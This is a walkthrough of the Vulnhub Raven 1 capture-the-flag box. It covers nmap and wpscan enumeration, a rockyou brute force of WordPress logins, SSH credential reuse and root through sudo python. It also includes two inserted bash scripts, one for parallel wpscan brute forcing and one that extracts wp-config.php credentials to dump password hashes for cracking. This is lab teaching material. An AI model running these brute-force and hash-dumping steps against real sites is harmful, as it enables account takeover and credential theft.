Vulnhub Raven 1 Walkthrough

By R3a50n



Raven 1 is listed as a beginner/intermediate CTF box on Vulnhub. I would classify it more as beginner, but it always depends on the attacker's skill set. I would recommend running it in VMware because of the trouble I had trying to get it running with VirtualBox.

Quick warning about the commands in this post. The font on this site renders double dashes (--) as one long dash. If you're getting syntax errors or other unexpected results, check the command's help output for the correct option spelling.

Ok on with the hacky stuff …

Step 1:

Identify the IP Address

netdiscover -r

In my lab it came out as but yours may vary.

Step 2:

Nmap Scan

nmap -sC -sV -v -oN map1

This runs version detection (-sV), the default NSE scripts (-sC), verbose output (-v) and writes the results to a file named map1 (-oN). Keep in mind this only scans the 1000 most common ports unless you specify otherwise (for example -p- for all 65535 ports).


Here we can see 22 (ssh), 80 (http) and 111 (rpcbind) are open. rpcbind also lists a few other RPC ports, but those aren't needed here. Let's take a look at the web port.

Step 3:

Browse to the site


It looks like WordPress, but let's look around a little. In the page source of the Service tab, the first flag becomes visible.


Navigating to the Blog tab confirms it's WordPress, but the page looks broken.


Looking at the source we can see it’s trying to locate raven.local.


By adding an entry for raven.local (pointing at the box's IP) to the /etc/hosts file, we can make things resolve properly.


Step 4:

Scan WordPress

Since this is WordPress, let’s run a wpscan and see if we can enumerate some users.

wpscan --url --enumerate u


Going to the login page, I tried to guess the passwords, but nothing worked. I did find out that there is no account lockout after failed attempts, which makes it a perfect candidate for a brute force attempt.


Step 5:

Brute Force

Wpscan will brute force the enumerated users, however, it only works on one user at a time. I wanted to attack both users at the same time, so I ran two separate instances of wpscan, each with one of the user names.

wpscan --url -U steven -w /usr/share/wordlists/rockyou.txt --threads 25

Note that these are the option names of the wpscan version used at the time; wpscan 3.x takes the password list with -P/--passwords and the thread count with -t/--max-threads instead of -w and --threads.
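The parallel run described above, written out as a small bash function. This is an added example, not the author's command line; it assumes the wpscan 3.x option names (-U/--usernames, -P/--passwords, -t/--max-threads) and a users file with one enumerated username per line, and each scan's output lands in its own log file so the valid combination can be grepped out afterwards.

```bash
#!/usr/bin/env bash
# Added example: one wpscan brute-force process per enumerated user, run in
# parallel. Assumes wpscan 3.x option names (-U/--usernames, -P/--passwords,
# -t/--max-threads); older versions used -w and --threads.
set -eu

# parallel_wpscan URL USERS_FILE WORDLIST [THREADS_PER_USER]
# Launches one wpscan per username in USERS_FILE (one name per line) in the
# background, writes each run's output to wpscan_<user>.log, waits for all of
# them and prints the log file names, one per line.
# The target sees THREADS_PER_USER x (number of users) concurrent login
# attempts, so keep the per-user count modest.
parallel_wpscan() {
    local url="$1" users="$2" wordlist="$3" threads="${4:-10}"
    local user pids="" logs=""
    while IFS= read -r user || [ -n "$user" ]; do
        [ -n "$user" ] || continue                     # skip blank lines
        wpscan --url "$url" -U "$user" -P "$wordlist" -t "$threads" \
            > "wpscan_${user}.log" 2>&1 &
        pids="$pids $!"
        logs="$logs wpscan_${user}.log"
    done < "$users"
    local pid
    for pid in $pids; do wait "$pid" || true; done     # wpscan may exit non-zero
    printf '%s\n' $logs
}

# Usage: ./parallel_wpscan.sh http://raven.local/ users.txt /usr/share/wordlists/rockyou.txt 10
if [ "$#" -ge 3 ]; then
    parallel_wpscan "$@"
fi
```

Each user gets a separate log, so a `grep -i valid wpscan_*.log` after the scans finish shows which account fell without scrolling through both outputs.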

After some time, the steven account displayed an error on one of the responses.


Let’s try it anyway … and it works!


Once logged in, you can also find flag3 within the posts.


Step 6:


So now we could try to abuse WordPress file uploads to get a shell, but first let's try something else. Remember the SSH port? The user may have reused his credentials there.

Let’s try it!


Step 7:

Post Exploitation – Root – Final Flag

It worked! Now we have user access on the box. If you're hunting for flags, our missing flag2 can be found in the /var/www directory.


Ok, let's get root. One of the first things to check is our sudo permissions (sudo -l).


This is great! We can run python as root, which means we can basically do whatever we want. Let's get a bash shell. The command I'm using is the same pty-spawn trick normally used to upgrade shells that don't have tty support, but run through sudo it works perfectly fine here as well: python spawns /bin/bash and, since python itself is running as root, so is the shell.


Root Dance!
And now we can go for that final flag …


That was Raven 1. Another path to the initial shell would have been to brute force the SSH login directly. I didn't do it initially because SSH brute forcing usually takes forever, but it does work. The wpscan brute force took over an hour, though I did have the threads split between two different accounts. With access to the WordPress directory you can read the root MySQL password from wp-config.php and query the database; the WordPress password hashes stored there could likely be cracked with hashcat or john faster than the wpscan brute force. In the end that wasn't needed.
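The wp-config.php route mentioned above, as an added example rather than anything from the original post: a bash script that pulls the database credentials and table prefix out of wp-config.php and builds the mysql query that dumps login:hash pairs for offline cracking. The wp-config.php contents and credentials in the script are constructed placeholders, not the box's real values.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): read the MySQL credentials out of
# wp-config.php and build the query that dumps WordPress password hashes for
# offline cracking. The sample config below is constructed; the placeholder
# credentials are not the box's real ones.
set -eu

# wp_config_value FILE NAME -> value of define('NAME', 'value') in wp-config.php.
# Handles single or double quotes; a value that itself contains a quote is not handled.
wp_config_value() {
    local file="$1" name="$2"
    sed -nE "s/^[[:space:]]*define\([[:space:]]*['\"]${name}['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1/p" "$file" | head -n 1
}

# wp_table_prefix FILE -> the $table_prefix setting, default wp_. The users
# table is <prefix>users, so a custom prefix would otherwise break the query.
wp_table_prefix() {
    local file="$1" prefix
    prefix=$(sed -nE "s/^[[:space:]]*\\\$table_prefix[[:space:]]*=[[:space:]]*['\"]([^'\"]*)['\"].*/\1/p" "$file" | head -n 1)
    printf '%s\n' "${prefix:-wp_}"
}

# wp_hash_dump_cmd FILE -> the mysql command that prints login:hash lines.
# wp_users stores phpass hashes ($P$...), which john (--format=phpass) and
# hashcat (-m 400) accept as-is.
wp_hash_dump_cmd() {
    local file="$1" host user pass db prefix
    host=$(wp_config_value "$file" DB_HOST)
    user=$(wp_config_value "$file" DB_USER)
    pass=$(wp_config_value "$file" DB_PASSWORD)
    db=$(wp_config_value "$file" DB_NAME)
    prefix=$(wp_table_prefix "$file")
    # -N drops the column header so the output is ready for a cracker.
    # The password is visible in the process list; fine on a CTF box, not elsewhere.
    printf "mysql -h '%s' -u '%s' -p'%s' -N -e 'SELECT CONCAT(user_login, \":\", user_pass) FROM %susers' '%s'\n" \
        "$host" "$user" "$pass" "$prefix" "$db"
}

# make_sample_config FILE -> writes a constructed wp-config.php for the demo.
make_sample_config() {
    cat > "$1" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'ExamplePassword123' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
EOF
}

main() {
    local cfg
    cfg=$(mktemp)
    make_sample_config "$cfg"
    wp_hash_dump_cmd "$cfg"    # on the box: run this and redirect to hashes.txt
    echo "# then: john --format=phpass hashes.txt"
    echo "#   or: hashcat -m 400 --username hashes.txt /usr/share/wordlists/rockyou.txt"
    rm -f "$cfg"
}
main
```

Point the functions at the real /var/www/html/wp-config.php (or wherever the site lives) instead of the sample, and note that hashcat needs --username because the dump is in login:hash form.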

Final Thoughts:

Raven 1 was more basic than intermediate, but decent for those just starting out. I don’t love brute force as a path on a CTF, but it is a good skill to learn. I thought flag2 was in a strange place and only found it by searching the file system after rooting the box. Putting it in one of the user directories (steven has access to both) would have made more sense. Anyway, it wasn’t a bad way to spend a few hours. I’ll have to try Raven 2 soon.

I also made a video with some extra content at the end. It shows SSH brute forcing with hydra and WordPress brute force with BurpSuite. You can find it here.

Happy Hacking

